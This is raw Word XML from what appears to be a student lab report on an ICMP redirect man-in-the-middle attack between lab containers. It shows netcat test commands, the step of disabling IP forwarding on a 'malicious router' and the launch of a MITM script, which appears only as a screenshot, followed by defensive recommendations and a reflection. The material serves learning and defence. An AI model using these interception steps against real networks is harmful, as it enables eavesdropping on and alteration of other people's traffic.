        <w:t xml:space="preserve">Task 2 – now we will start the TCP Client and server program using netcat by using the following </w:t>
      </w:r>
      <w:r w:rsidR="00F02201">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ommand</w:t>
      </w:r>
      <w:r w:rsidR="00F02201">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lp 9090 on the  destination container( 192.168.60.5) and nc 192.168.60.5 9090 on the victim container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A484D" w14:textId="00725EE1" w:rsidR="009A61A9" w:rsidRPr="00F02201" w:rsidRDefault="00F02201">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">By default the ip forwarding is enabled on the malicious </w:t>
      </w:r>
      <w:r w:rsidR="003C3F81">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">router so that it should behave like a router and transfer packets to other hosts. We will change this setting so that we can intercept the packet during the MITM attack </w:t>
      </w:r>
      <w:r w:rsidR="0082021B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>by setting the ipv4 forward limit to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677BD078" w14:textId="5CC05A49" w:rsidR="009A61A9" w:rsidRDefault="003C3F81">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F02201">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A547FA7" wp14:editId="76B22166">
            <wp:extent cx="4316315" cy="2353586"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="21435722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72206" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4335082" cy="2363819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D56162" w14:textId="5600C079" w:rsidR="0082021B" w:rsidRPr="0082021B" w:rsidRDefault="0082021B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0082021B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The last step is launching the mitm_sample.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007622B1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5BD4BC" w14:textId="79EB007E" w:rsidR="001C6AB7" w:rsidRDefault="001C6AB7" w:rsidP="001C6AB7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3427F7D7" wp14:editId="54CEF83D">
            <wp:extent cx="4797092" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="128997349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73494" name="Picture 5"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4004" cy="1385013"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="470C7957" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA" w:rsidP="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The script is a prime example of a Man-in-the-Middle (MITM) attack tool, in which the attacker listens for targeted communication, intercepts it, and may even change its contents before forwarding it to the intended target. Often, the intention is to steal or alter data without the sender's or recipient's awareness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F86EB9" w14:textId="77777777" w:rsidR="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51CB3D63" w14:textId="5AB65C1B" w:rsidR="009A61A9" w:rsidRDefault="001C6AB7">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367191B" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00CA3D3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA3D3F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack can be prevented by applying some measures by disabling the ICMP Redirect Acceptance which is a very common vulnerability in this attack</w:t>
      </w:r>
      <w:r w:rsidR="0002146F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>. Company must disable this from all hosts and routers. This can be done by the command sysctl net.ipv4.conf.all.accept_redirects=0 as we discussed during the lab. Usage of firewalls and antivirus software can be life saver in this attack, applying security tools can also prevent this attack from happening. It can block unauthorized and malicious connections from reaching your devices</w:t>
      </w:r>
      <w:r w:rsidR="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27460C1F" w14:textId="77777777" w:rsidR="00460018" w:rsidRPr="00460018" w:rsidRDefault="00460018" w:rsidP="00460018">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460018">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Make use of safe communication methods. </w:t>
      </w:r>
      <w:r w:rsidRPr="00460018">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>The use of SSL/TLS and HTTPS has grown in popularity. In reality, 95% of Google websites use HTTPS, according to the company's January 2022 transparency report. All HTTPS connections aren't created equal, either. Always verify that the website you are viewing has a valid certificate issued by a reputable organization by looking at its certificate information. Additionally, you should refrain from opening attachments or following links from unidentified or dubious sources since they may direct you to dangerous websites. Additionally, you ought to employ additional safe protocols like VPN (Virtual Private Network) to encrypt all of your network traffic, SFTP (safe File Transfer Protocol) for file transfers, and SSH (Secure Shell) for remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429AE73E" w14:textId="653B0BF4" w:rsidR="001C6AB7" w:rsidRPr="00621924" w:rsidRDefault="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Rublon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authors, December 14, 2023]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567FD7A3" w14:textId="77777777" w:rsidR="009A61A9" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E5CD066" w14:textId="79B3B896" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How MITM Attacks may be avoided using encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7DE88" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E41750" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>The most popular defense against a Man-in-the-Middle (MITM) attack is to encrypt communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6022B343" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>This is how the procedure operates: a server issues a digital certificate to identify the client during data transfers. After then, the client-server communication is encrypted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB996A" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>A key is required in encryption in order to both encrypt and decode shared messages between the sender and the recipient. That key is necessary for us to interpret the notes, and it is also necessary for the attackers. Nobody can access our information without the key. Data can be encrypted in two ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F233D" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Symmetric encryption encrypts and decrypts communications using a single encryption key that is exchanged in secret between the sender and the recipient. Because of its fast encryption speed, this approach is extensively utilized; nevertheless, a drawback is that we require a safe way to transfer the keys. The hacker can readily access our sent data if they manage to obtain the key. Data protection using symmetric encryption is the most extensively used and well-liked method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9C8EAF" w14:textId="24DB7D35" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>When using asymmetric encryption, two keys—the public and private keys—are needed to encrypt data. While the private key is solely known to the receiver and is used to decrypt data, the public key is broadcast via an open channel and is available to everyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F450042" w14:textId="731AAD28" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E336A21" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>There are a few specific ways that we can most likely stop MITM attacks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="650B3A6E" w14:textId="2A4A3325" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>We can avert these kinds of attacks by utilizing Virtual Private Networks, or VPNs. VPNs are used in local area networks to provide a secure environment for the usage of sensitive data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>[ Yathaarth Swaroop, September 18,2021 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FE433" w14:textId="7ACD6D91" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1937C714" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Steer clear of public networks when working on delicate or high-risk projects. Steer clear of public networks when performing sensitive chores like online banking or transactions involving sensitive information.</w:t>
      </w:r>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>Auto fill-ins should not be used on websites that are identified as insecure. utilize multi-factor authentication wherever possible, and never allow any insecure website to utilize your auto-filled usernames or passwords since this poses a significant danger.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38040739" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308408AC" w14:textId="77777777" w:rsidR="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>by using a network intrusion detection system to secure the network and installing the appropriate antivirus software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544D6DA6" w14:textId="77777777" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68E914FA" w14:textId="393B3C45" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>To keep your passwords safe, always use Password Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AE281E" w14:textId="77777777" w:rsidR="00621924" w:rsidRPr="00621924" w:rsidRDefault="00621924" w:rsidP="00621924">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00621924">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>[ Yathaarth Swaroop, September 18,2021 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38749FC5" w14:textId="77777777" w:rsidR="009A61A9" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0713EC5B" w14:textId="744C4D0A" w:rsidR="009A61A9" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Case reflection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAC239" w14:textId="77777777" w:rsidR="009A61A9" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A6B3C9" w14:textId="0E6C787A" w:rsidR="00543DDA" w:rsidRPr="00543DDA" w:rsidRDefault="00543DDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543DDA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>By perf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>orming the given experiment above a</w:t>
      </w:r>
      <w:r w:rsidR="00460018">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nd working on the report of MITM attack,  I have learnt that MITM attack can’t be performed without changing the route of redirected packet via the malicious router. That means that the biggest vulnerability in this attack is using a unsecured network which does not have SSL certificate. ICMP redirect attack wont work if the victim container </w:t>
      </w:r>
      <w:r w:rsidR="00701485">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>has turned on the countermeasure for not accepting redirect messages and the attack wont work that way. The attack also wont work if the malicious router settings are configured wrongly by means if its Ip forwarding is enabled .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7C1004" w14:textId="6A250F5B" w:rsidR="009A61A9" w:rsidRDefault="00460018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140E45D9" w14:textId="77777777" w:rsidR="009A61A9" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75FAD659" w14:textId="77777777" w:rsidR="009A61A9" w:rsidRDefault="009A61A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629716FF" w14:textId="77777777" w:rsidR="00C63ADA" w:rsidRDefault="00C63ADA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
